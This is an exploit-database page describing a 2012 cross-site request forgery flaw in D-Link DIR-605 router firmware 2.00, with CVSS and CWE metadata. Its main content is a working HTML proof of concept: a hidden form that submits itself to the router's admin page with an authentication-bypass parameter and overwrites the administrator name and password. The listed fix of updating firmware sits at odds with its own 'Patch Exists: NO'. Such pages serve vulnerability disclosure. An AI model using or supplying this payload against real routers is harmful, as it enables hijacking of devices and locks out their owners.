header-logo
Suggest Exploit
vendor:
DIR-605
by:
iqzer0++
7.5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: DIR-605
Affected Version From: Firmware Version: 2.00
Affected Version To: Firmware Version: 2.00
Patch Exists: NO
Related CWE:
CPE: h:d-link:dir-605
Metasploit:
Other Scripts:
Platforms Tested: DIR-605
2012

D-Link DIR-605 CSRF Vulnerability

This exploit allows unauthorized access to the D-Link DIR-605 device and perform post injections.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605

This allows unauthroized access to the device and post injections

<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
       <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="iqzer0" />
        <input type="hidden" name="admin_password1" value="bypass" />
        <input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>

Navigation

Suggest Exploit

Services By CQR